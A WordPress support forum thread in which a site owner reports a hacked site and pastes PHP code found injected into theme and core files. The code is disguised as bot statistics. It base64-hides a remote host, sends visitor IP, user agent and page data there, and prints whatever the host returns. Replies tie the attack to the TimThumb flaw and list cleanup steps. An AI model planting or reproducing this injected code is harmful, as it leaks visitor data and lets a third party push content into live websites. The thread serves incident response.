Title: Security Problem
Last modified: August 20, 2016

---

# Security Problem

 *  [giangel84](https://wordpress.org/support/users/giangel84/)
 * (@giangel84)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/)
 * Hi to all.
 * I hope that this thread is into correct section, else, please move it to the 
   right way.
 * Recently i’ve encountered a several security problems on my wordpress website.
 * All was started while a lot of spam was sended from my server (Contact Form 7
   3.0 Exploit? also though Really simple captcha is installed!)
 * Looking into ftp i’ve found these issues:
 * All .htaccess files were modified by insert some allow code into these.
 * There was created more folders randomly named, and was found into wp-content 
   directory.
 * All .php files named like “index”, “footer”, and “main” was modified and into
   them i’ve found this php code:
 *     ```
       <?php
           // This code use for global bot statistic
           $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
           $stCurlHandle = NULL;
           $stCurlLink = "";
           if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
           {
               if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
               $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                   $stCurlHandle = curl_init( $stCurlLink );
           }
           }
       if ( $stCurlHandle !== NULL )
       {
           curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
           $sResult = @curl_exec($stCurlHandle);
           if ($sResult[0]=="O")
            {$sResult[0]=" ";
             echo $sResult; // Statistic code end
             }
           curl_close($stCurlHandle);
       }
       ?>
       ```
   
 * So, i’m sure that there aren’t any plugins that could be the cause.
    I’m sure
   also that all files and folders permits are correctly setted.
 * I don’t know if these problem maybe caused by my Hosting security issue, or by
   a missing .htaccess configuration.
 * Can I lock in anyway, external access in order to fix the above issues?
 * Thanks a lot and sorry for my english!

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [Japh](https://wordpress.org/support/users/japh/)
 * (@japh)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312373)
 * Hello can you please clarify what version of WordPress you are running? Is it
   the latest (3.2.1)
 * Also, does your theme (or possibly any of your plugins) use the TimThumb script?
   You can find some information on the recent exploit of the previous TimThumb 
   version and how to fix it here: [http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/](http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/)
 * I hope that helps you.
 *  Thread Starter [giangel84](https://wordpress.org/support/users/giangel84/)
 * (@giangel84)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312670)
 * Yes, i’m using the last (3.2.1) WordPress version.
 * I think that i’ve found the problem and it was fixed.
 * So there are the steps that i’ve executed:
 * 1) First i’ve looking for any plugin that can include “timthumb.php” file function,
   like “Logo Management” and “WP-Mobile-Detector”.
    These were disabled and deleted.
 * 2) Reinstalled original WordPress files; Dashboard->Updates->Reinstall WordPress
   3.2.1 version.
 * 3) Reinstall original Plugins that was modified by the script.
 * 4) Cleared the theme’s files by deleting the added php script code (look script
   in the post above).
 * 5) Scan the website with Sucuri Online check tools ([http://sitecheck.sucuri.net/scanner](http://sitecheck.sucuri.net/scanner))
 * 6) Modify FTP password.
 * End.
 * Thank you very much Japh for your advice about “timthumb”.
    It was strongly useful.
 *  [Japh](https://wordpress.org/support/users/japh/)
 * (@japh)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312671)
 * I’m really pleased to hear you got it all fixed! Glad I could point you in the
   right direction 🙂
 *  Thread Starter [giangel84](https://wordpress.org/support/users/giangel84/)
 * (@giangel84)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312672)
 * Yes Japh.
 * Thank you so much again! 🙂
 * This is the malware that i’ve encountered in my case (for help others users):
   
   [http://sucuri.net/malware/malware-entry-mwjs159](http://sucuri.net/malware/malware-entry-mwjs159)
 * Bye!
 *  [Kapi31](https://wordpress.org/support/users/kapi31/)
 * (@kapi31)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312744)
 * Hello!
 * Unfortunatively I’m encountering the same issue… and not on 1 site, but 5. 4 
   are in WordPress.
 * I have local saves of my websites so I believe that I will only have to delete
   and replace all the files by my saved copies… even if it will be a huge work.
   Correct?
 * I have already changed my ftp access pwd.
 * BUT I have a question… Do you know if the virus changes the permissions on the
   different dir and files?
 * I have noticed that the virus has also added code to index.html and other html
   files at the root of some dir…
 * Other question… My antivirus has founded anything on my machine. When I have 
   noticed an issue… I think that it was a trap… I have immediately restore the 
   system configuration on a previous date. But should I reinstall all my system?
 * Many thanks for your help.
 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [14 years, 2 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312745)
 * **[@kapi31](https://wordpress.org/support/users/kapi31/)**, Please start your
   own thread.
 *  [Kapi31](https://wordpress.org/support/users/kapi31/)
 * (@kapi31)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312746)
 * Sure.
    Done. Thx.
 *  [Terry J](https://wordpress.org/support/users/texasbiz/)
 * (@texasbiz)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312769)
 * Great information. Same boat.
 * Could you tell me the easiest way to “look for any plugin that can include “timthumb.
   php” file function”?
 * Is there a easy way to find these type of plugins?
 * Thanks in advance.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312770)
 * Please post a new topic.
 *  [Terry J](https://wordpress.org/support/users/texasbiz/)
 * (@texasbiz)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312771)
 * Sorry, did not think posting a new topic / starting a new thread since “giangel84”
   had already stated here:
 * 1) First i’ve looking for any plugin that can include “timthumb.php” file function,
   like “Logo Management” and “WP-Mobile-Detector”.
    These were disabled and deleted.
 * Seems like extra clutter to me, but you the boss.

Viewing 10 replies - 1 through 10 (of 10 total)

The topic ‘Security Problem’ is closed to new replies.

## Tags

 * [htaccess](https://wordpress.org/support/topic-tag/htaccess/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 10 replies
 * 6 participants
 * Last reply from: [Terry J](https://wordpress.org/support/users/texasbiz/)
 * Last activity: [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312771)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics